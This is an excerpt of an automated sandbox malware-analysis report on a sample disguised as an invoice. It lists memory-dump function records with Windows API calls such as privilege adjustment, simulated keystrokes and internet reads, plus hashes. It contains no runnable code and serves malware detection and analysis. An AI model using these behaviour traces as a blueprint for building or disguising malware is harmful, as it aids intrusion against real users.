                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0023EBE0
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0023EC0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              • Opcode ID: f4250408afb8b44937d6d175227e0069ad2f0b970ce51f199c9d9fb001b1355f
                                                              • Instruction ID: 3946102574f2a609407318074926cd816f422b3746a090224d4edca2f9536afd
                                                              • Opcode Fuzzy Hash: f4250408afb8b44937d6d175227e0069ad2f0b970ce51f199c9d9fb001b1355f
                                                              • Instruction Fuzzy Hash: DD41DF74614302CFCB08DF28C490A9AB3E4FF49324F10451EE95A8B3E2DB31A969CF91
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 0fdac14bd582db45c75257f24f7537f8429993f8088fecc121b481134ea7bd02
                                                              • Instruction ID: bb65aa2b4c15ef1d96aacabf9f52a00998b3c69f34860f89ff489e84b8464895
                                                              • Opcode Fuzzy Hash: 0fdac14bd582db45c75257f24f7537f8429993f8088fecc121b481134ea7bd02
                                                              • Instruction Fuzzy Hash: 9111B6313106116BE7211F26EC48A6F77ADEF54761B054419F84DE7141CFB099568BA8
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0020E014,76230AE0,0020DEF1,0028DC38,?,?), ref: 0020E02C
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0020E03E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 214fc9cfd016032fdab756acec42d468cb3a4ad3540b467440dee035cb58b41e
                                                              • Instruction ID: 4d49e82b753960580bd59be6506f4467fa118570c3487b2d71fbc0080d6e951e
                                                              • Opcode Fuzzy Hash: 214fc9cfd016032fdab756acec42d468cb3a4ad3540b467440dee035cb58b41e
                                                              • Instruction Fuzzy Hash: 68D0A7B0460713DFCB314F64FD0C61277E5AF02310F19481AE88AE2190DBB4D8D4C750
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 0020B22F
                                                                • Part of subcall function 0020B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0020B5A5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Proc$LongWindow
                                                              • String ID:
                                                              • API String ID: 2749884682-0
                                                              • Opcode ID: 8a76eddbdf8be696c9742cb79a75c997ed225c64b1d69fe4285282a0eceb3512
                                                              • Instruction ID: d9a2fce38ea692837da5bbaeb1b15dca7e9c282a829e67e54dbea86a83b439b3
                                                              • Opcode Fuzzy Hash: 8a76eddbdf8be696c9742cb79a75c997ed225c64b1d69fe4285282a0eceb3512
                                                              • Instruction Fuzzy Hash: D4A15470134306BFDB3A6F2A5C99EBF2A6CEB52740B610119FC02D21D3DB649C709672
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002443BF,00000000), ref: 00244FA6
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00244FD2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: e5ac007f7a305b4c6026da06c77b1a7a89f287e811c2a0b36f40d848324f3d4a
                                                              • Instruction ID: 8ef07a9618228c5945ab7d1200eea17a4fca9f735daf6ce1578afe1c33fea8b6
                                                              • Opcode Fuzzy Hash: e5ac007f7a305b4c6026da06c77b1a7a89f287e811c2a0b36f40d848324f3d4a
                                                              • Instruction Fuzzy Hash: 97410A7552460ABFEB24DE80DC85FBFB7BCEF40714F10002AF60566581DAB19E559A50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: \Q*
                                                              • API String ID: 4104443479-3808209669
                                                              • Opcode ID: fc2455ef866def7644ed70e4df5bf030dbfaf219b58e52a692130cfed5f724c4
                                                              • Instruction ID: 8d3810607e87229a066de0f933f2679a0993d88fe0c981586101395273b8e46a
                                                              • Opcode Fuzzy Hash: fc2455ef866def7644ed70e4df5bf030dbfaf219b58e52a692130cfed5f724c4
                                                              • Instruction Fuzzy Hash: 5AA25C70D1421ACFDB28CF58C4806ADBBB1FF48314F2681A9D959AB391D7709E91DF90
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0023E20D
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0023E267
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0023E2B4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: f757fabfa9bea00eac082a022a752ae0bcd87f69dc7ce352ad522411ce842264
                                                              • Instruction ID: 541c3c550e8a0291f484395f25dfadd2ffb84752c4bcabe39b43ae68b97e2235
                                                              • Opcode Fuzzy Hash: f757fabfa9bea00eac082a022a752ae0bcd87f69dc7ce352ad522411ce842264
                                                              • Instruction Fuzzy Hash: EF216075A10218EFDB00EFA5D884EAEFBB8FF48310F0584AAE905A7251DB319955CF50
                                                              APIs
                                                                • Part of subcall function 0020F4EA: std::exception::exception.LIBCMT ref: 0020F51E
                                                                • Part of subcall function 0020F4EA: __CxxThrowException@8.LIBCMT ref: 0020F533
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022B180
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022B1AD
                                                              • GetLastError.KERNEL32 ref: 0022B1BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: 5f1d59fce1fe73c5d3b77863da153018f96ebd3ed97ba8d2ea44219850d60dd7
                                                              • Instruction ID: 17bc38e7c610204a9697d7995630f14f2c1ef590e362c1b16784053b386a8ead
                                                              • Opcode Fuzzy Hash: 5f1d59fce1fe73c5d3b77863da153018f96ebd3ed97ba8d2ea44219850d60dd7
                                                              • Instruction Fuzzy Hash: CC11BFB1424305BFE7289F94EC85D2BB7BCEF44710B20852EE45A97641EB70FC518A60
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00236623
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00236664
                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0023666F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 33631002-0
                                                              • Opcode ID: 3a588d0c3d2318968dee24657ce461757e2feb0edb274033eaace25ff22f007e
                                                              • Instruction ID: f11ba18c65ffa8882b334299bf500ee5c6488e49ca0afaa1e9d8b813e237d9c1
                                                              • Opcode Fuzzy Hash: 3a588d0c3d2318968dee24657ce461757e2feb0edb274033eaace25ff22f007e
                                                              • Instruction Fuzzy Hash: 811152B1E11228BFDB108F94DC45BAE7BBCEB45750F108151F914E6290D3B05A018BA1
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00237223
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0023723A
                                                              • FreeSid.ADVAPI32(?), ref: 0023724A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: c681ce9b9077216aa172a6296a87c56cd8660f91316ed5aa6d658f528aad1dad
                                                              • Instruction ID: 8a4304632b218afe9cc957e28d9fd380c604321188c2aaf48cc97abb30f7897a
                                                              • Opcode Fuzzy Hash: c681ce9b9077216aa172a6296a87c56cd8660f91316ed5aa6d658f528aad1dad
                                                              • Instruction Fuzzy Hash: D3F01D7AA14219FFDF04DFE4DD99EEEBBB8EF08301F105469A606E2191E2709A448B10
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0023F599
                                                              • FindClose.KERNEL32(00000000), ref: 0023F5C9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 6fdc8f08420a4ad4b7c092d8f2f6734ce2cb5210970f367301fdc71bc19716b0
                                                              • Instruction ID: e42117602dd1033bb2b4764aada9325b8271ab947f11e423fd9cf3d56a17ee3f
                                                              • Opcode Fuzzy Hash: 6fdc8f08420a4ad4b7c092d8f2f6734ce2cb5210970f367301fdc71bc19716b0
                                                              • Instruction Fuzzy Hash: 8811C0726102009FD700EF28D849A2EB3E8FF95324F00892EF8A9D7291DB30AD148F81
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0024BE6A,?,?,00000000,?), ref: 0023CEA7
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0024BE6A,?,?,00000000,?), ref: 0023CEB9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 0cfb6e83448ef0076b31b289e7334820bd6d563b08381e0ca4f8ed0b28dec69f
                                                              • Instruction ID: 9d82b8451d63fae59e7abdc1a1d95677bbef4242b44dfc816e5e04264705e666
                                                              • Opcode Fuzzy Hash: 0cfb6e83448ef0076b31b289e7334820bd6d563b08381e0ca4f8ed0b28dec69f
                                                              • Instruction Fuzzy Hash: 39F0827111422DABDB109FA4DC49FEA77ADBF08361F004165F919E6181D7709A50CBA0
                                                              APIs
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00234153
                                                              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00234166
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InputSendkeybd_event
                                                              • String ID:
                                                              • API String ID: 3536248340-0
                                                              • Opcode ID: 14013d39128210fb6f6051c36cbb03b1b3b814a5596eb7447fe5d2b6becf2d8e
                                                              • Instruction ID: af0e91f33bb36dea277e6f7ced380d7bd3c7a614eca13f9bd65c258038edaa98
                                                              • Opcode Fuzzy Hash: 14013d39128210fb6f6051c36cbb03b1b3b814a5596eb7447fe5d2b6becf2d8e
                                                              • Instruction Fuzzy Hash: EFF0907081034DAFDB059FA1C809BBE7FB0EF00305F008049F969A6191D779D652DFA0
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0022ACC0), ref: 0022AB99
                                                              • CloseHandle.KERNEL32(?,?,0022ACC0), ref: 0022ABAB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 00ceaa6401244b9084aa9930c90c9836ea5a29cff42bab2a60cdd6d1957830e8
                                                              • Instruction ID: 282780b3b506d2815288a66ba37df7d2007e028fb74b76a9d4bee197f0cd6803
                                                              • Opcode Fuzzy Hash: 00ceaa6401244b9084aa9930c90c9836ea5a29cff42bab2a60cdd6d1957830e8
                                                              • Instruction Fuzzy Hash: B8E0BF71014611AFE7652F54FD09D767BA9EF043207508469B45A81871D7625DA0DB50
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00216DB3,-0000031A,?,?,00000001), ref: 002181B1
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002181BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 2be16bb292c50aa6311cb821f648fbd3cdbf1444fd99e4cefa2eef6fdfa9ce6b
                                                              • Instruction ID: 9e7709f79355b6ef4d410d60273edfc1e0c4011b79cf61a537148a918031e0ad
                                                              • Opcode Fuzzy Hash: 2be16bb292c50aa6311cb821f648fbd3cdbf1444fd99e4cefa2eef6fdfa9ce6b
                                                              • Instruction Fuzzy Hash: 0CB09231084608ABDB002BA1FC0EB587FB8EF08662F004090F60D480618B7254908EA2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6516d51dc57f4779a7fb05df783e8756075b3a77d138565ff1cf16dbb9e6cce6
                                                              • Instruction ID: 6e3d093bc45aa83d0e1493a89d0033d1bfa9742fe9de5f25523dd2a4f5c4f422
                                                              • Opcode Fuzzy Hash: 6516d51dc57f4779a7fb05df783e8756075b3a77d138565ff1cf16dbb9e6cce6
                                                              • Instruction Fuzzy Hash: C5320435D39F018DDB239635D926336A28CAFB73D4F15D727E819B59AAEB29C4C34200
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: edf157cfe886cf97b9cddd19b3b08f4dbf527b64978d03cf4f7b49da1d5e4c9c
                                                              • Instruction ID: 480292b063ffb25e08f1924257eb7514a786e08acfd7f82b7334355a53a1b9fd
                                                              • Opcode Fuzzy Hash: edf157cfe886cf97b9cddd19b3b08f4dbf527b64978d03cf4f7b49da1d5e4c9c
                                                              • Instruction Fuzzy Hash: 1E2289716183059FD724EF24C891B6BB7E4BF84310F11491EFA9A97291DB71E944CF82
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64b2678782e17dafa24d83098c5e04a6b31395dde0e5153688569f53740dbd9f
                                                              • Instruction ID: b44aaf62d31fdafbacd7515a62959439b98cb1da4f47c07fe6dcd4758c5cd66c
                                                              • Opcode Fuzzy Hash: 64b2678782e17dafa24d83098c5e04a6b31395dde0e5153688569f53740dbd9f
                                                              • Instruction Fuzzy Hash: CEB11334D2AF614DD3239638A875336B65CAFBB2D5F91D71BFC1A70D22EB2185834280
                                                              APIs
                                                              • __time64.LIBCMT ref: 0023B6DF
                                                                • Part of subcall function 0021344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0023BDC3,00000000,?,?,?,?,0023BF70,00000000,?), ref: 00213453
                                                                • Part of subcall function 0021344A: __aulldiv.LIBCMT ref: 00213473
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
